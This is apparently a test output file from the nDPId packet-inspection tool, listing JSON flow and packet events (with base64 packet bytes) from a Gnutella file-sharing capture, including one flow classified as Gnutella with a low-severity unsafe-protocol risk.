00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":65065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADN4KsAAAER3GsKAAIP7\/\/\/+uEXB2wAuZDETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5JUENvbm5lY3Rpb246Mg0KTVg6IDMNCg0K"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":65240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":65240,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAp8AAEAGUxwOxwo8CgACD1uixCMAa2wB\/Z82JWAS\/\/+zDQAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":65241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":65241,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSFFAAIAGjW0KAAIPDscKPMQjW6L9nzYlAGtsAlAQ+vDP2QAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xttAAIAGndgKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1tAAIAGzIQKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq1AAIAGH9UKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66076,"flow_last_seen":66076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":66076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTdAAIAG3SoKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66077,"flow_last_seen":66077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66077,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":66077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0CoxAAIAGJkgKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66077,"flow_last_seen":66077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66077,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":66077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdlAAIAGUVwKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66078,"flow_last_seen":66078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66078,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":66078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66078,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8JAAIAGrlQKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66078,"flow_last_seen":66078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66078,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":66078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66078,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU5AAIAGi6EKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66079,"flow_last_seen":66079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66079,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":66079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66079,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY5AAIAGBqEKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpRAAIAGVgYKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FYBAAIAGQksKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTFAAIAGk6oKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67092,"flow_last_seen":67092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67092,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":67092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7lAAIAGcTAKAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67093,"flow_last_seen":67093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67093,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":67093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faFAAIAGiKYKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67093,"flow_last_seen":67093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67093,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":67093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0TEpAAIAGm28KAAIPdw6P7cQuGXtEBOluAAAAAIAC+vBV+AAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67094,"flow_last_seen":67094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67094,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":67094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67094,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R0xAAIAGN+UKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67094,"flow_last_seen":67094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67094,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":67094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67094,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtBAAIAGDgcKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67095,"flow_last_seen":67095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67095,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":67095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67095,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zZAAIAGNBkKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":67457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":67457,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqUAAP8GpiB3Do\/tCgACDxl7xC4AAAAARATpb1AUAACRqAAA"} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":67657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":67657,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqYAAP8Gw08k6cTiCgACDw7sxCwAAAAAEwSaoFAUAAA5OQAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":67969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67969,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0TEtAAIAGm24KAAIPdw6P7cQuGXtEBOluAAAAAIAC+vBV+AAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWtAAIAG8s0KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8xAAIAGVuUKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW9AAIAGEbYKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVtAAIAG3iAKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YFAAIAG1DgKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68108,"flow_last_seen":68108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68108,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":68108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bmJAAIAGaL8KAAIPdPGiosQyPT31tKkaAAAAAIAC+vCwPQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68108,"flow_last_seen":68108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68108,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":68108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4hAAIAGtdgKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68109,"flow_last_seen":68109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68109,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":68109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68109,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIlAAIAGNtsKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68109,"flow_last_seen":68109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68109,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 